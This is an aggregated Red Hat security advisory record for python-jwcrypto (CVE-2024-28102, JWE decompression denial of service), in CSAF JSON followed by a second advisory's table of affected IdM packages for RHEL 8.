"aggregate_severity": {
"namespace": "https://access.redhat.com/security/updates/classification/",
"text": "Moderate"
},
"category": "csaf_security_advisory",
"csaf_version": "2.0",
"distribution": {
"text": "Copyright \u00a9 Red Hat, Inc. All rights reserved.",
"tlp": {
"label": "WHITE",
"url": "https://www.first.org/tlp/"
}
},
"lang": "en",
"notes": [
{
"category": "summary",
"text": "An update for python-jwcrypto is now available for Red Hat Enterprise Linux 9.",
"title": "Topic"
},
{
"category": "general",
"text": "The python-jwcrypto package provides Python implementations of the JSON Web Key (JWK), JSON Web Signature (JWS), JSON Web Encryption (JWE), and JSON Web Token (JWT) JOSE (JSON Object Signing and Encryption) standards.\n\nSecurity Fix(es):\n\n* python-jwcrypto: malicious JWE token can cause denial of service (CVE-2024-28102)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.",
"title": "Details"
},
{
"category": "legal_disclaimer",
"text": "This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.",
"title": "Terms of Use"
}
],
"publisher": {
"category": "vendor",
"contact_details": "https://access.redhat.com/security/team/contact/",
"issuing_authority": "Red Hat Product Security is responsible for vulnerability handling across all Red Hat products and services.",
"name": "Red Hat Product Security",
"namespace": "https://www.redhat.com"
},
"references": [
{
"category": "self",
"summary": "https://access.redhat.com/errata/RHSA-2024:2559",
"url": "https://access.redhat.com/errata/RHSA-2024:2559"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/updates/classification/#moderate",
"url": "https://access.redhat.com/security/updates/classification/#moderate"
},
{
"category": "external",
"summary": "2268758",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2268758"
},
{
"category": "self",
"summary": "Canonical URL",
"url": "https://security.access.redhat.com/data/csaf/v2/advisories/2024/rhsa-2024_2559.json"
}
],
"title": "Red Hat Security Advisory: python-jwcrypto security update",
"tracking": {
"current_release_date": "2024-11-24T15:20:40+00:00",
"generator": {
"date": "2024-11-24T15:20:40+00:00",
"engine": {
"name": "Red Hat SDEngine",
"version": "4.2.1"
}
},
"id": "RHSA-2024:2559",
"initial_release_date": "2024-04-30T13:36:16+00:00",
"revision_history": [
{
"date": "2024-04-30T13:36:16+00:00",
"number": "1",
"summary": "Initial version"
},
{
"date": "2024-04-30T13:36:16+00:00",
"number": "2",
"summary": "Last updated version"
},
{
"date": "2024-11-24T15:20:40+00:00",
"number": "3",
"summary": "Last generated version"
}
],
"status": "final",
"version": "3"
}
},
"product_tree": {
"branches": [
{
"branches": [
{
"branches": [
{
"category": "product_name",
"name": "Red Hat Enterprise Linux AppStream (v. 9)",
"product": {
"name": "Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.4.0.Z.MAIN.EUS",
"product_identification_helper": {
"cpe": "cpe:/a:redhat:enterprise_linux:9::appstream"
}
}
}
],
"category": "product_family",
"name": "Red Hat Enterprise Linux"
},
{
"branches": [
{
"category": "product_version",
"name": "python-jwcrypto-0:0.8-5.el9_4.src",
"product": {
"name": "python-jwcrypto-0:0.8-5.el9_4.src",
"product_id": "python-jwcrypto-0:0.8-5.el9_4.src",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/python-jwcrypto@0.8-5.el9_4?arch=src"
}
}
}
],
"category": "architecture",
"name": "src"
},
{
"branches": [
{
"category": "product_version",
"name": "python3-jwcrypto-0:0.8-5.el9_4.noarch",
"product": {
"name": "python3-jwcrypto-0:0.8-5.el9_4.noarch",
"product_id": "python3-jwcrypto-0:0.8-5.el9_4.noarch",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/python3-jwcrypto@0.8-5.el9_4?arch=noarch"
}
}
}
],
"category": "architecture",
"name": "noarch"
}
],
"category": "vendor",
"name": "Red Hat"
}
],
"relationships": [
{
"category": "default_component_of",
"full_product_name": {
"name": "python-jwcrypto-0:0.8-5.el9_4.src as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.4.0.Z.MAIN.EUS:python-jwcrypto-0:0.8-5.el9_4.src"
},
"product_reference": "python-jwcrypto-0:0.8-5.el9_4.src",
"relates_to_product_reference": "AppStream-9.4.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3-jwcrypto-0:0.8-5.el9_4.noarch as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.4.0.Z.MAIN.EUS:python3-jwcrypto-0:0.8-5.el9_4.noarch"
},
"product_reference": "python3-jwcrypto-0:0.8-5.el9_4.noarch",
"relates_to_product_reference": "AppStream-9.4.0.Z.MAIN.EUS"
}
]
},
"vulnerabilities": [
{
"cve": "CVE-2024-28102",
"cwe": {
"id": "CWE-400",
"name": "Uncontrolled Resource Consumption"
},
"discovery_date": "2024-03-10T00:00:00+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2268758"
}
],
"notes": [
{
"category": "description",
"text": "An uncontrolled resource consumption vulnerability was found in python-jwcrypto. If a malicious JWE token with a high compression ratio is passed to the server, the server will consume a lot of memory and processing time, leading to a denial of service.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "python-jwcrypto: malicious JWE token can cause denial of service",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "The CVE-2024-28102 vulnerability in JWCrypto represents a moderate severity issue due to its potential impact on system availability and resource consumption. While the vulnerability allows for a denial of service (DoS) attack, it requires an attacker to craft a malicious JWE Token with a high compression ratio. This specific condition limits the practical exploitability of the vulnerability to some extent, as it demands a more sophisticated attack approach than common vulnerabilities. Nonetheless, if exploited, the vulnerability can lead to significant memory exhaustion and increased server processing time, impacting the overall performance and availability of the affected system.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"AppStream-9.4.0.Z.MAIN.EUS:python-jwcrypto-0:0.8-5.el9_4.src",
"AppStream-9.4.0.Z.MAIN.EUS:python3-jwcrypto-0:0.8-5.el9_4.noarch"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2024-28102"
},
{
"category": "external",
"summary": "RHBZ#2268758",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2268758"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2024-28102",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-28102"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2024-28102",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-28102"
},
{
"category": "external",
"summary": "https://github.com/latchset/jwcrypto/commit/90477a3b6e73da69740e00b8161f53fea19b831f",
"url": "https://github.com/latchset/jwcrypto/commit/90477a3b6e73da69740e00b8161f53fea19b831f"
},
{
"category": "external",
"summary": "https://github.com/latchset/jwcrypto/security/advisories/GHSA-j857-7rvv-vj97",
"url": "https://github.com/latchset/jwcrypto/security/advisories/GHSA-j857-7rvv-vj97"
}
],
"release_date": "2024-03-08T00:00:00+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2024-04-30T13:36:16+00:00",
"details": "Before applying this update, make sure all previously released errata\nrelevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"AppStream-9.4.0.Z.MAIN.EUS:python-jwcrypto-0:0.8-5.el9_4.src",
"AppStream-9.4.0.Z.MAIN.EUS:python3-jwcrypto-0:0.8-5.el9_4.noarch"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2024:2559"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options don\u0027t meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
"product_ids": [
"AppStream-9.4.0.Z.MAIN.EUS:python-jwcrypto-0:0.8-5.el9_4.src",
"AppStream-9.4.0.Z.MAIN.EUS:python3-jwcrypto-0:0.8-5.el9_4.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 6.8,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "HIGH",
"scope": "CHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"AppStream-9.4.0.Z.MAIN.EUS:python-jwcrypto-0:0.8-5.el9_4.src",
"AppStream-9.4.0.Z.MAIN.EUS:python3-jwcrypto-0:0.8-5.el9_4.noarch"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "python-jwcrypto: malicious JWE token can cause denial of service"
}
]
}
RHSA-2024_3267
Vulnerability from csaf_redhat - Published: 2024-05-22 11:47 - Updated: 2024-11-24 15:46A vulnerability was found in JWCrypto. This flaw allows an attacker to cause a denial of service (DoS) attack and possible password brute-force and dictionary attacks to be more resource-intensive. This issue can result in a large amount of computational consumption, causing a denial of service attack.
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:bind-dyndb-ldap-0:11.6-5.module+el8.10.0+21691+df63127d.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:bind-dyndb-ldap-0:11.6-5.module+el8.10.0+21691+df63127d.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:bind-dyndb-ldap-0:11.6-5.module+el8.10.0+21691+df63127d.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:bind-dyndb-ldap-0:11.6-5.module+el8.10.0+21691+df63127d.src | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:bind-dyndb-ldap-0:11.6-5.module+el8.10.0+21691+df63127d.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:bind-dyndb-ldap-debuginfo-0:11.6-5.module+el8.10.0+21691+df63127d.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:bind-dyndb-ldap-debuginfo-0:11.6-5.module+el8.10.0+21691+df63127d.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:bind-dyndb-ldap-debuginfo-0:11.6-5.module+el8.10.0+21691+df63127d.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:bind-dyndb-ldap-debuginfo-0:11.6-5.module+el8.10.0+21691+df63127d.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:bind-dyndb-ldap-debugsource-0:11.6-5.module+el8.10.0+21691+df63127d.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:bind-dyndb-ldap-debugsource-0:11.6-5.module+el8.10.0+21691+df63127d.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:bind-dyndb-ldap-debugsource-0:11.6-5.module+el8.10.0+21691+df63127d.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:bind-dyndb-ldap-debugsource-0:11.6-5.module+el8.10.0+21691+df63127d.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:custodia-0:0.6.0-3.module+el8.9.0+18911+94941f82.noarch | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:custodia-0:0.6.0-3.module+el8.9.0+18911+94941f82.src | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-0:4.9.13-9.module+el8.10.0+21691+df63127d.src | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-client-0:4.9.13-9.module+el8.10.0+21691+df63127d.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-client-0:4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-client-0:4.9.13-9.module+el8.10.0+21691+df63127d.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-client-0:4.9.13-9.module+el8.10.0+21691+df63127d.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-client-common-0:4.9.13-9.module+el8.10.0+21691+df63127d.noarch | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-client-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-client-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-client-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-client-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-client-epn-0:4.9.13-9.module+el8.10.0+21691+df63127d.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-client-epn-0:4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-client-epn-0:4.9.13-9.module+el8.10.0+21691+df63127d.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-client-epn-0:4.9.13-9.module+el8.10.0+21691+df63127d.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-client-samba-0:4.9.13-9.module+el8.10.0+21691+df63127d.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-client-samba-0:4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-client-samba-0:4.9.13-9.module+el8.10.0+21691+df63127d.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-client-samba-0:4.9.13-9.module+el8.10.0+21691+df63127d.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-common-0:4.9.13-9.module+el8.10.0+21691+df63127d.noarch | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-debugsource-0:4.9.13-9.module+el8.10.0+21691+df63127d.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-debugsource-0:4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-debugsource-0:4.9.13-9.module+el8.10.0+21691+df63127d.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-debugsource-0:4.9.13-9.module+el8.10.0+21691+df63127d.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-healthcheck-0:0.12-3.module+el8.9.0+19634+c162f948.noarch | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-healthcheck-0:0.12-3.module+el8.9.0+19634+c162f948.src | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-healthcheck-core-0:0.12-3.module+el8.9.0+19634+c162f948.noarch | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-python-compat-0:4.9.13-9.module+el8.10.0+21691+df63127d.noarch | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-selinux-0:4.9.13-9.module+el8.10.0+21691+df63127d.noarch | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-server-0:4.9.13-9.module+el8.10.0+21691+df63127d.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-server-0:4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-server-0:4.9.13-9.module+el8.10.0+21691+df63127d.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-server-0:4.9.13-9.module+el8.10.0+21691+df63127d.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-server-common-0:4.9.13-9.module+el8.10.0+21691+df63127d.noarch | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-server-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-server-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-server-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-server-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-server-dns-0:4.9.13-9.module+el8.10.0+21691+df63127d.noarch | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-server-trust-ad-0:4.9.13-9.module+el8.10.0+21691+df63127d.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-server-trust-ad-0:4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-server-trust-ad-0:4.9.13-9.module+el8.10.0+21691+df63127d.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-server-trust-ad-0:4.9.13-9.module+el8.10.0+21691+df63127d.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-server-trust-ad-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-server-trust-ad-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-server-trust-ad-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-server-trust-ad-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:opendnssec-0:2.1.7-1.module+el8.9.0+18911+94941f82.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:opendnssec-0:2.1.7-1.module+el8.9.0+18911+94941f82.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:opendnssec-0:2.1.7-1.module+el8.9.0+18911+94941f82.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:opendnssec-0:2.1.7-1.module+el8.9.0+18911+94941f82.src | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:opendnssec-0:2.1.7-1.module+el8.9.0+18911+94941f82.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:opendnssec-debuginfo-0:2.1.7-1.module+el8.9.0+18911+94941f82.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:opendnssec-debuginfo-0:2.1.7-1.module+el8.9.0+18911+94941f82.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:opendnssec-debuginfo-0:2.1.7-1.module+el8.9.0+18911+94941f82.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:opendnssec-debuginfo-0:2.1.7-1.module+el8.9.0+18911+94941f82.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:opendnssec-debugsource-0:2.1.7-1.module+el8.9.0+18911+94941f82.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:opendnssec-debugsource-0:2.1.7-1.module+el8.9.0+18911+94941f82.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:opendnssec-debugsource-0:2.1.7-1.module+el8.9.0+18911+94941f82.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:opendnssec-debugsource-0:2.1.7-1.module+el8.9.0+18911+94941f82.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:python-jwcrypto-0:0.5.0-2.module+el8.10.0+21691+df63127d.src | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:python-kdcproxy-0:0.4-5.module+el8.9.0+18911+94941f82.src | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:python-qrcode-0:5.1-12.module+el8.9.0+18911+94941f82.src | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:python-yubico-0:1.3.2-9.1.module+el8.9.0+18911+94941f82.src | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:python3-custodia-0:0.6.0-3.module+el8.9.0+18911+94941f82.noarch | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:python3-ipaclient-0:4.9.13-9.module+el8.10.0+21691+df63127d.noarch | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:python3-ipalib-0:4.9.13-9.module+el8.10.0+21691+df63127d.noarch | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:python3-ipaserver-0:4.9.13-9.module+el8.10.0+21691+df63127d.noarch | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:python3-ipatests-0:4.9.13-9.module+el8.10.0+21691+df63127d.noarch | — |
Vendor Fix
fix
Workaround
|
|
